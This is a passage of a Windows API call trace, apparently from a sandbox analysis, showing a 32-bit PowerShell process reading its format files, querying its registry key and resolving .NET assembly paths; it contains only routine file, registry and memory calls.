	[0225.682] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0225.682] GetLastError () returned 0x0
	[0225.682] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0xaca, lpOverlapped=0x0) returned 1
	[0225.682] GetLastError () returned 0x0
	[0225.682] ReadFile (in: hFile=0x32c, lpBuffer=0x2f22f4e, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f22f4e*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0225.682] GetLastError () returned 0x0
	[0225.682] ReadFile (in: hFile=0x32c, lpBuffer=0x2f238e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2f238e4*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0225.682] GetLastError () returned 0x0
	[0225.682] CloseHandle (hObject=0x32c) returned 1
	[0225.682] GetLastError () returned 0x0
	[0225.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.682] GetLastError () returned 0x0
	[0225.682] SetErrorMode (uMode=0x1) returned 0x1
	[0225.683] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f448e0 | out: lpFileInformation=0x2f448e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0225.683] GetLastError () returned 0x0
	[0225.683] SetErrorMode (uMode=0x1) returned 0x1
	[0225.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.683] GetLastError () returned 0x0
	[0225.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e3a8 | out: phkResult=0x29e3a8*=0x32c) returned 0x0
	[0225.683] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x0, lpcbData=0x29e3ec*=0x0 | out: lpType=0x29e3f0*=0x1, lpData=0x0, lpcbData=0x29e3ec*=0x56) returned 0x0
	[0225.683] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e3f0, lpData=0x7a4288, lpcbData=0x29e3ec*=0x56 | out: lpType=0x29e3f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e3ec*=0x56) returned 0x0
	[0225.684] RegCloseKey (hKey=0x32c) returned 0x0
	[0225.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.684] GetLastError () returned 0x0
	[0225.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29dee4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0225.684] GetLastError () returned 0x0
	[0225.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0225.727] GetLastError () returned 0x0
	[0225.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0225.730] GetLastError () returned 0x57
	[0225.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0225.740] GetLastError () returned 0x57
	[0225.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.747] GetLastError () returned 0x57
	[0225.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0225.822] GetLastError () returned 0x57
	[0225.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0225.830] GetLastError () returned 0x57
	[0225.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0225.835] GetLastError () returned 0x57
	[0225.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0225.841] GetLastError () returned 0x57
	[0225.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0225.850] GetLastError () returned 0x57
	[0225.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0225.966] GetLastError () returned 0x57
	[0225.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0225.968] GetLastError () returned 0x57
	[0225.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.969] GetLastError () returned 0x57
	[0225.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0225.970] GetLastError () returned 0x57
	[0225.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0225.971] GetLastError () returned 0x57
	[0225.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0225.972] GetLastError () returned 0x57
	[0225.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0225.974] GetLastError () returned 0x57
	[0225.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0225.974] GetLastError () returned 0x57
	[0225.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0225.974] GetLastError () returned 0x57
	[0225.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.974] GetLastError () returned 0x57
	[0225.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.975] GetLastError () returned 0x57
	[0225.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.975] GetLastError () returned 0x57
	[0225.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.975] GetLastError () returned 0x57
	[0225.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.975] GetLastError () returned 0x57
	[0226.009] VirtualQuery (in: lpAddress=0x29d100, lpBuffer=0x29e100, dwLength=0x1c | out: lpBuffer=0x29e100*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.013] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x70fa91b3, Data2=0xd7ea, Data3=0x487a, Data4=([0]=0x85, [1]=0x6e, [2]=0x1c, [3]=0x6f, [4]=0xd0, [5]=0x14, [6]=0x34, [7]=0x97))) returned 0x0
	[0226.108] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x9579b832, Data2=0x6da1, Data3=0x4ecf, Data4=([0]=0x88, [1]=0x80, [2]=0x67, [3]=0xd1, [4]=0xd7, [5]=0x43, [6]=0x2d, [7]=0x35))) returned 0x0
	[0226.108] VirtualQuery (in: lpAddress=0x29d178, lpBuffer=0x29e178, dwLength=0x1c | out: lpBuffer=0x29e178*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.108] VirtualQuery (in: lpAddress=0x29d178, lpBuffer=0x29e178, dwLength=0x1c | out: lpBuffer=0x29e178*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.109] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x20fc027a, Data2=0x58f3, Data3=0x4368, Data4=([0]=0x8e, [1]=0xc5, [2]=0x53, [3]=0x28, [4]=0x77, [5]=0xab, [6]=0x5b, [7]=0x35))) returned 0x0
	[0226.117] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xdc08ee47, Data2=0xc634, Data3=0x499c, Data4=([0]=0x93, [1]=0x3b, [2]=0x82, [3]=0x2b, [4]=0xd5, [5]=0x79, [6]=0xbe, [7]=0xc0))) returned 0x0
	[0226.117] VirtualQuery (in: lpAddress=0x29d2a4, lpBuffer=0x29e2a4, dwLength=0x1c | out: lpBuffer=0x29e2a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.117] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.118] VirtualQuery (in: lpAddress=0x29d150, lpBuffer=0x29e150, dwLength=0x1c | out: lpBuffer=0x29e150*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.118] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xe8c4d25a, Data2=0x4c52, Data3=0x4355, Data4=([0]=0xb9, [1]=0x47, [2]=0xa7, [3]=0xd1, [4]=0xa8, [5]=0x69, [6]=0x66, [7]=0x56))) returned 0x0
	[0226.118] VirtualQuery (in: lpAddress=0x29d2a4, lpBuffer=0x29e2a4, dwLength=0x1c | out: lpBuffer=0x29e2a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.118] VirtualQuery (in: lpAddress=0x29d1bc, lpBuffer=0x29e1bc, dwLength=0x1c | out: lpBuffer=0x29e1bc*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.119] VirtualQuery (in: lpAddress=0x29ce70, lpBuffer=0x29de70, dwLength=0x1c | out: lpBuffer=0x29de70*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.119] VirtualQuery (in: lpAddress=0x29ce70, lpBuffer=0x29de70, dwLength=0x1c | out: lpBuffer=0x29de70*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.119] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0xf893b081, Data2=0xa2cd, Data3=0x48b6, Data4=([0]=0x8c, [1]=0x18, [2]=0xf1, [3]=0x7a, [4]=0xf6, [5]=0x68, [6]=0xee, [7]=0x8a))) returned 0x0
	[0226.119] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x979d6b69, Data2=0xadcf, Data3=0x4b36, Data4=([0]=0x92, [1]=0x55, [2]=0x37, [3]=0x14, [4]=0x22, [5]=0x40, [6]=0x49, [7]=0x32))) returned 0x0
	[0226.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29debc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0226.120] GetLastError () returned 0x57
	[0226.120] SetErrorMode (uMode=0x1) returned 0x1
	[0226.120] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358
	[0226.120] GetLastError () returned 0x0
	[0226.120] GetFileType (hFile=0x358) returned 0x1
	[0226.120] SetErrorMode (uMode=0x1) returned 0x1
	[0226.120] GetFileType (hFile=0x358) returned 0x1
	[0226.120] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.121] GetLastError () returned 0x0
	[0226.121] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.125] GetLastError () returned 0x0
	[0226.125] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.125] GetLastError () returned 0x0
	[0226.125] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.125] GetLastError () returned 0x0
	[0226.125] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.125] GetLastError () returned 0x0
	[0226.126] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.126] GetLastError () returned 0x0
	[0226.126] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.126] GetLastError () returned 0x0
	[0226.126] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.126] GetLastError () returned 0x0
	[0226.128] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.128] GetLastError () returned 0x0
	[0226.128] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.128] GetLastError () returned 0x0
	[0226.128] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.128] GetLastError () returned 0x0
	[0226.128] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.128] GetLastError () returned 0x0
	[0226.129] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.129] GetLastError () returned 0x0
	[0226.129] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.129] GetLastError () returned 0x0
	[0226.129] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.129] GetLastError () returned 0x0
	[0226.130] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.130] GetLastError () returned 0x0
	[0226.133] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x1000, lpOverlapped=0x0) returned 1
	[0226.133] GetLastError () returned 0x0
	[0226.133] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0xbce, lpOverlapped=0x0) returned 1
	[0226.133] GetLastError () returned 0x0
	[0226.133] ReadFile (in: hFile=0x358, lpBuffer=0x2e30fce, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e30fce*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.133] GetLastError () returned 0x0
	[0226.133] ReadFile (in: hFile=0x358, lpBuffer=0x2e31860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x29e424, lpOverlapped=0x0 | out: lpBuffer=0x2e31860*, lpNumberOfBytesRead=0x29e424*=0x0, lpOverlapped=0x0) returned 1
	[0226.133] GetLastError () returned 0x0
	[0226.133] CloseHandle (hObject=0x358) returned 1
	[0226.134] GetLastError () returned 0x0
	[0226.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x29df84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0226.134] GetLastError () returned 0x0
	[0226.134] SetErrorMode (uMode=0x1) returned 0x1
